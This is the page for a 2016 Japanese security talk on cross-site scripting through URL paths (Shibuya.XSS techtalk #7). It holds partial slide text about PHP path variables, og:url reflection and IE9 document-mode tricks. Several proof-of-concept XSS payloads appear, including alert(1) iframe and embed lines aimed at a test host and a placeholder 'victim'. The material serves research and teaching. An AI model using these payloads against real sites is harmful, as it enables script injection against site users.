Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7
Search
Sponsored
·
SiteGround - Reliable hosting with speed, security, and support you can count on.
→
Masato Kinugawa
March 29, 2016
Technology
28k
14
Share
明日から使える?! PATHでXSSする技術/ Shibuya.XSS techtalk #7
Shibuya.XSS techtalk #7 の資料です。
Masato Kinugawa
March 29, 2016
More Decks by Masato Kinugawa
See All by Masato Kinugawa
Shadow DOMとセキュリティ - 光と影の境界を探る / Shibuya.XSS techtalk #13
masatokinugawa
0
780
Shadow DOM & Security - Exploring the boundary between light and shadow
masatokinugawa
1
2k
ブラウザのレガシー・独自機能を愛でる-Firefoxの脆弱性4選- / Browser Crash Club #1
masatokinugawa
1
1.1k
注目したいクライアントサイドの脆弱性2選/ Security.Tokyo #3
masatokinugawa
8
4.3k
バグハンティングのすゝめ / P3NFEST
masatokinugawa
5
2.7k
Pwn2OwnでMicrosoft Teamsをハッキングして2000万円を獲得した方法/ Shibuya.XSS techtalk #12
masatokinugawa
13
21k
How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
masatokinugawa
1
24k
JSでDoSる/ Shibuya.XSS techtalk #11
masatokinugawa
20
7.1k
Electron: Abusing the lack of context isolation - CureCon(en)
masatokinugawa
5
110k
Other Decks in Technology
See All in Technology
Azure Static Web Apps の自動ビルドがタイムアウトしやすくなった状況に対応した件/global-azure2026
thara0402
0
390
AWS DevOps Agentはチームメイトになれるのか?/ Can AWS DevOps Agent become a teammate
kinunori
6
730
マルチエージェント × ハーネスエンジニアリング × GitLab Duo Agent Platformで実現する「AIエージェントに仕事をさせる時代へ。」 / 20260421 GitLab Duo Agent Platform
n11sh1
0
150
扱える不確実性を増やしていく - スタートアップEMが考える「任せ方」
kadoppe
0
290
AI バイブコーティングでキーボード不要?!
samakada
0
540
こんなアーキテクチャ図はいやだ / Anti-pattern in AWS Architecture Diagrams
naospon
1
450
20年前の「OSS革命」に学ぶ AI時代の生存戦略
samakada
0
410
AWS認定資格は本当に意味があるのか?
nrinetcom
PRO
2
270
Hacobu Tech Deck
hacobu
PRO
0
110
Amazon S3 Filesについて
yama3133
2
210
KGDC_13_Amazon Q Developerで挑む! 13事例から見えたAX組織変革の最前線_公開情報
kikugawa
0
130
Claude Code を安全に使おう勉強会 / Claude Code Security Basics
masahirokawahara
11
31k
Featured
See All Featured
Crafting Experiences
bethany
1
110
Ecommerce SEO: The Keys for Success Now & Beyond - #SERPConf2024
aleyda
1
1.9k
The innovator’s Mindset - Leading Through an Era of Exponential Change - McGill University 2025
jdejongh
PRO
1
160
The Organizational Zoo: Understanding Human Behavior Agility Through Metaphoric Constructive Conversations (based on the works of Arthur Shelley, Ph.D)
kimpetersen
PRO
0
310
Building a A Zero-Code AI SEO Workflow
portentint
PRO
0
450
Save Time (by Creating Custom Rails Generators)
garrettdimon
PRO
32
2.8k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
34
2.7k
How to Align SEO within the Product Triangle To Get Buy-In & Support - #RIMC
aleyda
1
1.5k
コードの90%をAIが書く世界で何が待っているのか / What awaits us in a world where 90% of the code is written by AI
rkaga
61
43k
Become a Pro
speakerdeck
PRO
31
5.9k
What's in a price? How to price your products and services
michaelherold
247
13k
We Are The Robots
honzajavorek
0
210
Transcript
None
None
None
None
None
https://host/tags/aaa/ ... </head> <body> <form> <input type="text" value="aaa"> ...
... </head> <meta property="og:url" content="https://host/path/index"> <body> ... https://host/path/index?p=1
... </head> <meta property="og:url" content="https://host/path/index;aaa"> <body> ... https://host/path/index;aaa?p=1
None
http://php.net/index.php http://php.net/index.php/xxx/yyy/zzz
http://shibuyaxss.connpass.com/event/28232/ http://shibuyaxss.connpass.com/event/28232/;abc
None
SCRIPT_URL /test.php/<b>PATH</b> SCRIPT_URI http://localhost/test.php/<b>PATH</b> PATH_INFO /<b>PATH</b> PATH_TRANSLATED \<b>PATH<\b> PHP_SELF /test.php/<b>PATH</b>
GET /path?query HTTP/1.1 http://php.net/manual/ja/reserved.variables.server.php
/test.php/<b>PATH</b>?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?%3Cb%3EQUERY% 3C/b%3E HTTP/1.1 QUERY_STRING %3Cb%3EQUERY%3C/b%3E REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E? %3Cb%3EQUERY%3C/b%3E
http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>
/test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> GET /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> HTTP/1.1 QUERY_STRING <b>QUERY</b> REQUEST_URI /test.php/%3Cb%3EPATH%3C/b%3E?<b>QUERY</b> http://localhost/test.php/<b>PATH</b>?<b>QUERY</b>
http://localhost/test.php/<b>PATH</b> GET /test.php/<b>PATH</b> HTTP/1.1
/test.php/%3Cb%3EPATH%3C/b%3E GET /test.php/<b>PATH</b> HTTP/1.1 REQUEST_URI /test.php/<b>PATH</b> location.pathname /test.php/%3Cb%3EPATH%3C/b%3E http://localhost/test.php/<b>PATH</b>
None
None
None
None
None
None
None
None
None
None
None
None
None
None
None
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 X-UA-Compatible: IE=9 <head> <meta
http-equiv="X-UA-Compatible" content="IE=9"> </head>
<svg> <circle cx="100" cy="100" r="50" fill="red"/> </svg>
ifr=document.createElement('<iframe onload=alert(1)>'); document.body.appendChild(ifr); InvalidCharacterError
<meta http-equiv="X-UA-Compatible" content="IE=9"> <script> console.log(document.documentMode) /* 9 */ </script> <iframe
src=//victim/></iframe> http://blogs.msdn.com/cfs-filesystemfile.ashx/__key/communityserver-blogs-components- weblogfiles/00-00-01-35-07/3073.IE_5F00_chart_5F00_jp.pdf
<meta http-equiv="X-UA-Compatible" content="IE=9"> <embed src="http://shibuya.vulnerabledoma.in/javascript:alert(1)/% 2F..%2F..%2Fjizen2#hash"></embed>
<script src="//ajax.googleapis.com/ajax/libs/jquerymobile/1.4.5/jquery.mobile.min.js"> </script>
None
None
None
None
None
None
None
None
None
None
None
None
None
SiteGround - Reliable hosting with speed, security, and support you can count on.
masatokinugawa
thara0402
kinunori
n11sh1
kadoppe
samakada
naospon
nrinetcom
hacobu
yama3133
kikugawa
masahirokawahara
bethany
aleyda
jdejongh
kimpetersen
portentint
garrettdimon
jcasabona
rkaga
speakerdeck
michaelherold
honzajavorek
